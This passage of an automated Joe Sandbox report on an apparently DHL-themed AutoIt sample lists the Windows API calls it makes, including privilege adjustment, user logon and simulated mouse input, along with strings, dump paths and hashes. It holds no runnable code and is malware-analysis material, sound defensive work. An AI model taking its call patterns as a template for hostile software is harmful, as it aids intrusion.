                                                                                    • Opcode ID: a56cf165df82949b969c3ffe93aa55f1206796951aff6866b8382aa09fa1afb1
                                                                                    • Instruction ID: 3fd52ee62c81b9a4f42bed2d70b512bca3640adf497b33a440bb02b484596d57
                                                                                    • Instruction Fuzzy Hash: F4F03C75D1120CBBDB04DFE49D99AADB7B8FF08201F104869A605E2182D7755A448B50
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0081C6FB
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081C72B
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 241e5ed2efe8d3aa718a71ddb2c9a664bf30822ae3b36425df21ffcd9b49d579
                                                                                    • Instruction ID: 8f0b2d7b2a1b54dc1fdbc297e5b9e15a140bc7ac52d53564f46e3aedcc4cd369
                                                                                    • Instruction Fuzzy Hash: 691165726006049FDB10DF29D849A6AF7E9FF85324F00891DFAA9D7291DB74AC05CF81
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00829468,?,0083FB84,?), ref: 0081A097
                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00829468,?,0083FB84,?), ref: 0081A0A9
                                                                                    Similarity
                                                                                    • API ID: ErrorFormatLastMessage
                                                                                    • String ID:
                                                                                    • API String ID: 3479602957-0
                                                                                    • Opcode ID: 2ab53e6502aeafbcca741db00b19e2073946c050222dd2e264c9b1bc4651aeeb
                                                                                    • Instruction ID: cfeb0db3c7d95a69a2bb613223a3eccc69b856be990641b33f775bf14f5bfe20
                                                                                    • Instruction Fuzzy Hash: C3F0823550522DEBDB219FA4CC49FEA776CFF0C361F004165F909D6191D6709940CBE1
                                                                                    APIs
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00808309), ref: 008081E0
                                                                                    • CloseHandle.KERNEL32(?,?,00808309), ref: 008081F2
                                                                                    Similarity
                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                    • String ID:
                                                                                    • API String ID: 81990902-0
                                                                                    • Opcode ID: ab97e9df0517a668b8e3748fad9e896f03acf7c0d9030e00213398946927ee5a
                                                                                    • Instruction ID: 937807be82a67fdecff6c3998cdf193ea64f3b626b67e84dad38c085fdfcb745
                                                                                    • Instruction Fuzzy Hash: 1AE0BF71010510EFE7252B75EC09E7777A9FF44310B14982EB59584571DB615C91DB50
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,007D8D57,?,?,?,00000001), ref: 007DA15A
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 007DA163
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: f8a808fd290c3e9e18cf4189e8b4d6089718611bf4ac631f1ae3066525b6723f
                                                                                    • Instruction ID: 8859b48166b33bcc81c24758b81b71f174780e3a0f7d4438b90c30d8bd9615e7
                                                                                    • Instruction Fuzzy Hash: B4B09231454208ABCA002B91EC09B8A3F68FB85AA2F404420F70D85262CB6254508AD1
                                                                                    • Opcode ID: bab57e6021264d31473bbde600375ed41721a022ca76a964b6b24e1f4ee8b6f7
                                                                                    • Instruction ID: c0f1d15630d45ac3c89673db884c1dfe351bedb19354ffcfa5888fb961d32a1e
                                                                                    • Instruction Fuzzy Hash: 3232E026D29F414DD7239634D832336A299EFB73D4F15D737E81AB5AA6EB28D4838100
                                                                                    • Opcode ID: b4dbeee81633ffdcad1d6aa89bde56d201034b6cc5530a4e06ad6e5b40758d4c
                                                                                    • Instruction ID: 6fb0c3a7f2eabd6fb52cf0868ccf8ed0eb9aa2711635b9eafbeb61b0849e7b58
                                                                                    • Instruction Fuzzy Hash: 96B1DE34E6AF414DD2239A398835336B65CBFBB2D9B51D71BFC2674E22FB2185838141
                                                                                    APIs
                                                                                    • __time64.LIBCMT ref: 0081889B
                                                                                      • Part of subcall function 007D520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00818F6E,00000000,?,?,?,?,0081911F,00000000,?), ref: 007D5213
                                                                                      • Part of subcall function 007D520A: __aulldiv.LIBCMT ref: 007D5233
                                                                                    Similarity
                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                    • String ID:
                                                                                    • API String ID: 2893107130-0
                                                                                    • Opcode ID: ceda32a2ba5c30fa6c4f65f27d448edaa85ea5318a6b6973b7a5d5b52bd7b8e0
                                                                                    • Instruction ID: 6f1ca99463868ac540885e08ff189252c08a7362bab212b85119d477174b5670
                                                                                    • Instruction Fuzzy Hash: 4A21E432635510CBC329CF29D841A92B3E5FFA4310B688E2CD0F9CB2C0CA34B945DB54
                                                                                    APIs
                                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00814C4A
                                                                                    Similarity
                                                                                    • API ID: mouse_event
                                                                                    • String ID:
                                                                                    • API String ID: 2434400541-0
                                                                                    • Opcode ID: f5c77f327e4306d8d5b554755586183e83105bf6d7e5d5f82e76f7d3e859e9b8
                                                                                    • Instruction ID: ef65d2659280b2e4fc2cb1c90e016563ba929c38d0c06e81312d0dbe741d7ef9
                                                                                    • Opcode Fuzzy Hash: f5c77f327e4306d8d5b554755586183e83105bf6d7e5d5f82e76f7d3e859e9b8
                                                                                    • Instruction Fuzzy Hash: 04D09EA516561D79ED1C07649E1FFFB114DFB40796FD8B5497601CA0C2ECA05CC461B1
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00808389), ref: 008087D1
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: LogonUser
• API String ID: 1244722697-0
• Opcode ID: a5f88d4663ce5e9569c176ea4791decbae9bc8fe5bce6d16c53944f43bca0d92
• Instruction ID: 97306455250ad9684197eef7210e73c3eee3d0aa55da970f152e12930e6d1d2c
• Opcode Fuzzy Hash: a5f88d4663ce5e9569c176ea4791decbae9bc8fe5bce6d16c53944f43bca0d92
• Instruction Fuzzy Hash: A7D09E3226490EABEF019EA8DD05EAE3B69EB04B01F408511FE15D51A1C775D935AB60
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 007DA12A
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• API String ID: 3192549508-0
• Opcode ID: 4f210eedf9f7b597c304486aa0537b74288cb3f3782c130dfc398e6b26902837
• Instruction ID: e88886c1003158ed5f77fcaba7b7e7d773309aaa524d4dfcdf100968e71a5419
• Opcode Fuzzy Hash: 4f210eedf9f7b597c304486aa0537b74288cb3f3782c130dfc398e6b26902837
• Instruction Fuzzy Hash: E7A0123000010CA78A001B41EC044457F5CE641190B004020F50C411228732541045C0
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• Opcode ID: 28d2f1837e1f9254482c6ea5a410312ab101cf1fb22c206c1141cf4460e62a8b
• Instruction ID: 7c48238c59606f9351ade9da6e848d6bd7da1d14a22df324c1806dd3ee390258
• Opcode Fuzzy Hash: 28d2f1837e1f9254482c6ea5a410312ab101cf1fb22c206c1141cf4460e62a8b
• Instruction Fuzzy Hash: B4223430604516CBDFA88A28C894B7DB7A1FF41344F29806ED946CB5D2EB78ED91CB53
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction ID: ddcd63f640d2f801ead943866dcf31e680e75eef9d1a04c9caf70dfed3314170
• Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction Fuzzy Hash: 2AC1853230519309DB2D4639843443EFAB15EA27B136A075FD8B3CB6D5EF18D927D620
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction ID: 23bd3cd3aedd27a819b716f0ab5188dcd0e0b5225b41eb71defd379c3f8a124f
• Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction Fuzzy Hash: C4C1743230519309DF2D4639C43413EBAB15EA27B135A076FD4B2DB6D5EF18D926D620
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction ID: 4fcf91bc62a5d56aa00c6638a4e4e665743fc97e1ac38997464d2cf61c7b603d
• Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction Fuzzy Hash: 7DC1813230919319DF2D4639843413EBBB25EA27B139A076FD4B2DB6D5EF28C925D620
APIs
• DeleteObject.GDI32(00000000), ref: 0082785B
• DeleteObject.GDI32(00000000), ref: 0082786D
• DestroyWindow.USER32 ref: 0082787B
• GetDesktopWindow.USER32 ref: 00827895
• GetWindowRect.USER32(00000000), ref: 0082789C
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008279DD
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008279ED
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827A35
• GetClientRect.USER32(00000000,?), ref: 00827A41
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00827A7B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827A9D
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827AB0
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827ABB
• GlobalLock.KERNEL32(00000000), ref: 00827AC4
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827AD3
• GlobalUnlock.KERNEL32(00000000), ref: 00827ADC
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827AE3
• GlobalFree.KERNEL32(00000000), ref: 00827AEE
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827B00
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00842CAC,00000000), ref: 00827B16
• GlobalFree.KERNEL32(00000000), ref: 00827B26
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00827B4C
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00827B6B
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827B8D
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827D7A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 2211948467-2373415609
• Opcode ID: f475e6701f5b5e78a5a1d5c1a42a75a3895ce3ecaa1f0cdb6e0eb668933badbe
• Instruction ID: 1aff7c00a683a4c375a441f03e656ccf0a97347a4612484f471b476043907f9c
• Opcode Fuzzy Hash: f475e6701f5b5e78a5a1d5c1a42a75a3895ce3ecaa1f0cdb6e0eb668933badbe
• Instruction Fuzzy Hash: 8C024B71900219EFDB14DFA5DC89EAE7BB9FB48310F108558FA15EB2A2C7749D41CBA0
APIs
• CharUpperBuffW.USER32(?,?,0083F910), ref: 00833627
• IsWindowVisible.USER32(?), ref: 0083364B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: BuffCharUpperVisibleWindow
• String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
• API String ID: 4105515805-45149045
• Opcode ID: bb607d96c7ea70c5d2a6758b62552b6491a7bc15c089a88e36a80249ed50b351
• Instruction ID: 8812d65b8445a64750004ae86f802ac15a38537f5baa5c161c1269ec81c9a790
• Opcode Fuzzy Hash: bb607d96c7ea70c5d2a6758b62552b6491a7bc15c089a88e36a80249ed50b351
• Instruction Fuzzy Hash: 97D16D30208301DBCA04EF14C856B6E77A5FFD5354F158868F9869B3E2DB35EA4ACB81
                                                                                    APIs
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0083A630
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0083A661
                                                                                    • GetSysColor.USER32(0000000F), ref: 0083A66D
                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 0083A687
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0083A696
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0083A6C1
                                                                                    • GetSysColor.USER32(00000010), ref: 0083A6C9
                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 0083A6D0
                                                                                    • FrameRect.USER32(?,?,00000000), ref: 0083A6DF
                                                                                    • DeleteObject.GDI32(00000000), ref: 0083A6E6
                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0083A731
                                                                                    • FillRect.USER32(?,?,00000000), ref: 0083A763
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0083A78E
                                                                                      • Part of subcall function 0083A8CA: GetSysColor.USER32(00000012), ref: 0083A903
                                                                                      • Part of subcall function 0083A8CA: SetTextColor.GDI32(?,?), ref: 0083A907
                                                                                      • Part of subcall function 0083A8CA: GetSysColorBrush.USER32(0000000F), ref: 0083A91D
                                                                                      • Part of subcall function 0083A8CA: GetSysColor.USER32(0000000F), ref: 0083A928
                                                                                      • Part of subcall function 0083A8CA: GetSysColor.USER32(00000011), ref: 0083A945
                                                                                      • Part of subcall function 0083A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0083A953
                                                                                      • Part of subcall function 0083A8CA: SelectObject.GDI32(?,00000000), ref: 0083A964
                                                                                      • Part of subcall function 0083A8CA: SetBkColor.GDI32(?,00000000), ref: 0083A96D
                                                                                      • Part of subcall function 0083A8CA: SelectObject.GDI32(?,?), ref: 0083A97A
                                                                                      • Part of subcall function 0083A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0083A999
                                                                                      • Part of subcall function 0083A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0083A9B0
                                                                                      • Part of subcall function 0083A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0083A9C5
                                                                                      • Part of subcall function 0083A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0083A9ED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 3521893082-0
                                                                                    • Opcode ID: 646a99732f1a9ce27f5336e2766789867ab89069605fcf79c46e89d483857366
                                                                                    • Instruction ID: d9ed8db7a47cf88ac6ebaa3ebbba998ea24e66ed2a873cf874643c90f301f150
                                                                                    • Opcode Fuzzy Hash: 646a99732f1a9ce27f5336e2766789867ab89069605fcf79c46e89d483857366
                                                                                    • Instruction Fuzzy Hash: 72916D72408305FFCB159F64DC48A5B7BA9FBC8321F104E29F6A2D61A2D771D944CB92
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,?,?), ref: 007B2CA2
                                                                                    • DeleteObject.GDI32(00000000), ref: 007B2CE8
                                                                                    • DeleteObject.GDI32(00000000), ref: 007B2CF3
                                                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 007B2CFE
                                                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 007B2D09
                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 007EC43B
                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007EC474
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 007EC89D
                                                                                      • Part of subcall function 007B1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007B2036,?,00000000,?,?,?,?,007B16CB,00000000,?), ref: 007B1B9A
                                                                                    • SendMessageW.USER32(?,00001053), ref: 007EC8DA
                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007EC8F1
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007EC907
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007EC912
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                    • String ID: 0
                                                                                    • API String ID: 464785882-4108050209
                                                                                    • Opcode ID: c44254155987326cd78f64340a2ce739b268dca8a9cdafd771b002d5af399cd7
                                                                                    • Instruction ID: 25f823194422ef64f77d9a6e80f2cdb574322e4b6da04191b9816b7cb6c4a7b9
                                                                                    • Opcode Fuzzy Hash: c44254155987326cd78f64340a2ce739b268dca8a9cdafd771b002d5af399cd7
                                                                                    • Instruction Fuzzy Hash: B7129E34602241EFDB16CF25C988BA9BBE1BF49300F544969F595CB262C739E853CBA1
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000), ref: 008274DE
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0082759D
                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008275DB
                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008275ED
                                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00827633
                                                                                    • GetClientRect.USER32(00000000,?), ref: 0082763F
                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00827683
                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00827692
                                                                                    • GetStockObject.GDI32(00000011), ref: 008276A2
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 008276A6
                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008276B6
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008276BF
                                                                                    • DeleteDC.GDI32(00000000), ref: 008276C8
                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008276F4
                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0082770B
                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00827746
                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0082775A
                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0082776B
                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0082779B
                                                                                    • GetStockObject.GDI32(00000011), ref: 008277A6
                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008277B1
                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 008277BB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                    • API String ID: 2910397461-517079104
                                                                                    • Opcode ID: 36bad4ec1fbe2de00245b99608a63a0e0b069c5cfb320897de5beeba99adedaf
                                                                                    • Instruction ID: fc45ce4af9f540eca66f3a2650ee433def5766b8b8cff16a14fb6031852cb9a8
                                                                                    • Opcode Fuzzy Hash: 36bad4ec1fbe2de00245b99608a63a0e0b069c5cfb320897de5beeba99adedaf
                                                                                    • Instruction Fuzzy Hash: 6FA16DB1A00615BFEB14DBA4DC4AFAEBBA9FB44710F004514FA14E72E1D7B4AD40CBA4
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0081AD1E
                                                                                    • GetDriveTypeW.KERNEL32(?,0083FAC0,?,\\.\,0083F910), ref: 0081ADFB
                                                                                    • SetErrorMode.KERNEL32(00000000,0083FAC0,?,\\.\,0083F910), ref: 0081AF59
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
